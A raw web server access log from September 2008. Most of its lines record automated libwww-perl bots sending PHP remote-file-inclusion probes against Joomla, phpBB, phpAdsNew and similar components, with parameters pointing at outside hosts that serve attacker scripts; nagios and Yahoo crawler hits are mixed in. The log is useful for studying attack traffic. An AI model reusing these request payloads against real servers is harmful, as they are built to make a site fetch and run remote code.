213.165.80.16 - - [02/Sep/2008:00:30:17 -0400] "GET /basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
213.165.80.16 - - [02/Sep/2008:00:30:17 -0400] "GET /logs/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Sep/2008:00:30:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.104.33.42 - - [02/Sep/2008:00:30:28 -0400] "GET /logs/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.811"
216.104.33.42 - - [02/Sep/2008:00:30:28 -0400] "GET /logs/error_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
216.104.33.42 - - [02/Sep/2008:00:30:28 -0400] "GET /logs/access_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
216.104.33.42 - - [02/Sep/2008:00:30:28 -0400] "GET /basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
213.165.80.16 - - [02/Sep/2008:00:30:33 -0400] "GET /logs/access_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
205.211.11.1 - - [02/Sep/2008:00:30:53 -0400] "GET /logs/error_log.Q108072600//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:00:30:54 -0400] "GET /logs/access_log.Q108072400//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
65.36.166.240 - - [02/Sep/2008:00:30:55 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:30:55 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:30:55 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
83.96.139.40 - - [02/Sep/2008:00:31:54 -0400] "GET /basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:31:54 -0400] "GET /logs/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:31:54 -0400] "GET /logs/access_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:32:01 -0400] "GET /logs/error_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:32:27 -0400] "GET /basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:32:28 -0400] "GET /logs/access_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:32:28 -0400] "GET /logs/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:32:34 -0400] "GET /logs/error_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
74.6.8.96 - - [02/Sep/2008:00:32:57 -0400] "GET /images/_notes/contact_fax.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.238.52.92 - - [02/Sep/2008:00:34:13 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
74.6.8.96 - - [02/Sep/2008:00:33:32 -0400] "GET /logs/access_log.Q108011800 HTTP/1.0" 200 3147814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.109.108.39 - - [02/Sep/2008:00:34:59 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
208.109.108.39 - - [02/Sep/2008:00:34:59 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
200.105.239.8 - - [02/Sep/2008:00:34:59 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
200.105.239.8 - - [02/Sep/2008:00:35:00 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
89.248.101.69 - - [02/Sep/2008:00:35:00 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
89.248.101.69 - - [02/Sep/2008:00:35:00 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
200.105.239.8 - - [02/Sep/2008:00:35:00 -0400] "GET /logs/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 63996 "-" "libwww-perl/5.805"
208.109.108.39 - - [02/Sep/2008:00:34:59 -0400] "GET /logs/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 63996 "-" "libwww-perl/5.803"
89.25.48.91 - - [02/Sep/2008:00:35:03 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
89.25.48.91 - - [02/Sep/2008:00:35:03 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
89.248.101.69 - - [02/Sep/2008:00:35:00 -0400] "GET /logs/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 63996 "-" "libwww-perl/5.803"
89.25.48.91 - - [02/Sep/2008:00:35:04 -0400] "GET /logs/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 63996 "-" "libwww-perl/5.805"
200.105.239.8 - - [02/Sep/2008:00:35:11 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
89.248.101.69 - - [02/Sep/2008:00:35:16 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
89.25.48.91 - - [02/Sep/2008:00:35:18 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
208.109.108.39 - - [02/Sep/2008:00:35:20 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Sep/2008:00:35:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
71.119.54.161 - - [02/Sep/2008:00:36:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [02/Sep/2008:00:36:57 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [02/Sep/2008:00:37:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [02/Sep/2008:00:37:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
146.164.3.7 - - [02/Sep/2008:00:37:11 -0400] "GET /logs/error_log.Q108021600//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
146.164.3.7 - - [02/Sep/2008:00:37:11 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
146.164.3.7 - - [02/Sep/2008:00:37:12 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
194.135.105.1 - - [02/Sep/2008:00:37:22 -0400] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:00:37:22 -0400] "GET /logs/access_log.Q108081900/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:00:37:28 -0400] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:00:37:28 -0400] "GET /logs/access_log.Q108082000/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.147.236.10 - - [02/Sep/2008:00:38:14 -0400] "GET /logs/error_log.Q108061500//components/errors.php?error=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
65.36.166.240 - - [02/Sep/2008:00:39:47 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:39:47 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:39:47 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
12.28.104.201 - - [02/Sep/2008:00:40:40 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
12.28.104.201 - - [02/Sep/2008:00:40:40 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
12.28.104.201 - - [02/Sep/2008:00:40:41 -0400] "GET /logs/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 63996 "-" "libwww-perl/5.79"
12.28.104.201 - - [02/Sep/2008:00:40:52 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
64.128.80.13 - - [02/Sep/2008:00:42:07 -0400] "GET /logs/error_log.Q108081300//admin.remository.php?path_escape=http://www.chakde.net/orca/js/idchitoz.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
64.128.80.13 - - [02/Sep/2008:00:42:07 -0400] "GET //admin.remository.php?path_escape=http://www.chakde.net/orca/js/idchitoz.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
64.128.80.13 - - [02/Sep/2008:00:42:07 -0400] "GET /logs//admin.remository.php?path_escape=http://www.chakde.net/orca/js/idchitoz.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
89.188.122.50 - - [02/Sep/2008:00:42:14 -0400] "GET /logs/access_log.Q108082300//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
64.128.80.13 - - [02/Sep/2008:00:42:15 -0400] "GET /logs/access_log.Q108081300//admin.remository.php?path_escape=http://www.chakde.net/orca/js/idchitoz.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
205.211.11.1 - - [02/Sep/2008:00:42:22 -0400] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:00:42:22 -0400] "GET //phpAdsNew/view.inc.php?phpAds_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:00:42:24 -0400] "GET /logs/access_log.Q108062200//phpAdsNew/view.inc.php?phpAds_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
216.70.73.146 - - [02/Sep/2008:00:43:09 -0400] "GET /logs/access_log.Q108062400/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://kantuet.siteburg.com/cmdguest.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
216.70.73.146 - - [02/Sep/2008:00:43:09 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://kantuet.siteburg.com/cmdguest.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
216.70.73.146 - - [02/Sep/2008:00:43:09 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://kantuet.siteburg.com/cmdguest.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
89.25.48.91 - - [02/Sep/2008:00:43:18 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Sep/2008:00:43:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.109.108.39 - - [02/Sep/2008:00:43:46 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
89.248.101.69 - - [02/Sep/2008:00:43:49 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
200.105.239.8 - - [02/Sep/2008:00:43:59 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
213.165.80.16 - - [02/Sep/2008:00:44:02 -0400] "GET /logs/error_log.Q108081300%20/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
216.104.33.42 - - [02/Sep/2008:00:44:30 -0400] "GET /logs/error_log.Q108081300%20/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
83.96.139.40 - - [02/Sep/2008:00:45:01 -0400] "GET /logs/error_log.Q108081300%20/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:00:45:08 -0400] "GET /logs/error_log.Q108081300%20/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
12.28.104.201 - - [02/Sep/2008:00:45:13 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:45:16 -0400] "GET /logs/error_log.Q108061500//toolbar.php?dirDepth=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:45:17 -0400] "GET //toolbar.php?dirDepth=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:45:17 -0400] "GET /logs//toolbar.php?dirDepth=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:46:46 -0400] "GET /logs/access_log.Q108082300//toolbar.php?dirDepth=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
216.70.73.146 - - [02/Sep/2008:00:48:24 -0400] "GET /logs/access_log.Q108062400/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://kantuet.siteburg.com/cmdguest.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
216.70.73.146 - - [02/Sep/2008:00:48:24 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://kantuet.siteburg.com/cmdguest.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
216.70.73.146 - - [02/Sep/2008:00:48:24 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://kantuet.siteburg.com/cmdguest.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
209.59.12.99 - - [02/Sep/2008:00:48:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.36.166.240 - - [02/Sep/2008:00:48:35 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:48:35 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:48:35 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
91.142.209.168 - - [02/Sep/2008:00:49:18 -0400] "GET /logs/error_log.Q108060500/////?mosConfig_lang=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
91.142.209.168 - - [02/Sep/2008:00:49:18 -0400] "GET /////?mosConfig_lang=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 200 455 "-" "libwww-perl/5.79"
91.142.209.168 - - [02/Sep/2008:00:49:19 -0400] "GET /logs/////?mosConfig_lang=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 200 64004 "-" "libwww-perl/5.79"
87.248.163.41 - - [02/Sep/2008:00:49:52 -0400] "GET /logs/error_log.Q108081300%20/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
74.6.8.96 - - [02/Sep/2008:00:50:03 -0400] "GET /logs/error_log.Q107091800 HTTP/1.0" 200 89305 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.238.195.13 - - [02/Sep/2008:00:51:35 -0400] "GET /logs/error_log.Q108071100//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
72.9.248.162 - - [02/Sep/2008:00:51:56 -0400] "GET /logs/access_log.Q108081300//atom.php5?page=http://www.frequent-nb.de/phpbb2//language/lang_english/osid6.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
72.9.248.162 - - [02/Sep/2008:00:51:56 -0400] "GET /logs/error_log.Q108081300//atom.php5?page=http://www.frequent-nb.de/phpbb2//language/lang_english/osid6.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
72.9.248.162 - - [02/Sep/2008:00:51:56 -0400] "GET //atom.php5?page=http://www.frequent-nb.de/phpbb2//language/lang_english/osid6.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
72.9.248.162 - - [02/Sep/2008:00:51:56 -0400] "GET /logs//atom.php5?page=http://www.frequent-nb.de/phpbb2//language/lang_english/osid6.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
190.138.154.11 - - [02/Sep/2008:00:52:35 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:00:52:35 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:00:52:35 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:00:52:36 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Sep/2008:00:53:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.158.0.5 - - [02/Sep/2008:00:53:54 -0400] "GET /logs/access_log.Q108081900//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:53:55 -0400] "GET //e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:53:55 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:54:07 -0400] "GET /logs/access_log.Q108080900//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:54:07 -0400] "GET //e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:54:07 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
61.56.146.2 - - [02/Sep/2008:00:54:10 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
61.56.146.2 - - [02/Sep/2008:00:54:12 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:54:16 -0400] "GET /logs/error_log.Q108080900//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
205.211.11.1 - - [02/Sep/2008:00:54:16 -0400] "GET /logs/access_log.Q108062200%20//phpAdsNew/view.inc.php?phpAds_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
61.56.146.2 - - [02/Sep/2008:00:54:14 -0400] "GET /logs/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 63996 "-" "libwww-perl/5.79"
65.36.166.240 - - [02/Sep/2008:00:54:22 -0400] "GET //config.php?inc_dir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:54:22 -0400] "GET /logs/error_log.Q108081100//config.php?inc_dir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:54:22 -0400] "GET /logs//config.php?inc_dir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:54:23 -0400] "GET /logs/access_log.Q108062900//config.php?inc_dir=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
205.211.11.1 - - [02/Sep/2008:00:54:33 -0400] "GET /logs/error_log.Q108062200%20//phpAdsNew/view.inc.php?phpAds_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
62.87.154.41 - - [02/Sep/2008:00:54:47 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 216 "-" "libwww-perl/5.803"
61.56.146.2 - - [02/Sep/2008:00:54:57 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
212.50.0.218 - - [02/Sep/2008:00:55:26 -0400] "GET /logs/error_log.Q108061900/?sourcedir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
212.50.0.218 - - [02/Sep/2008:00:55:27 -0400] "GET /?sourcedir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
212.50.0.218 - - [02/Sep/2008:00:55:27 -0400] "GET /logs/?sourcedir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 63996 "-" "libwww-perl/5.803"
212.50.0.218 - - [02/Sep/2008:00:55:40 -0400] "GET /logs/access_log.Q108061900/?sourcedir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
88.158.0.5 - - [02/Sep/2008:00:55:47 -0400] "GET /logs/access_log.Q108080900//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
64.59.71.79 - - [02/Sep/2008:00:56:04 -0400] "GET /logs/access_log.Q108082000/phphtml.php?htmlclass_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
64.59.71.79 - - [02/Sep/2008:00:56:04 -0400] "GET /phphtml.php?htmlclass_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.65"
64.59.71.79 - - [02/Sep/2008:00:56:04 -0400] "GET /logs/phphtml.php?htmlclass_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.65"
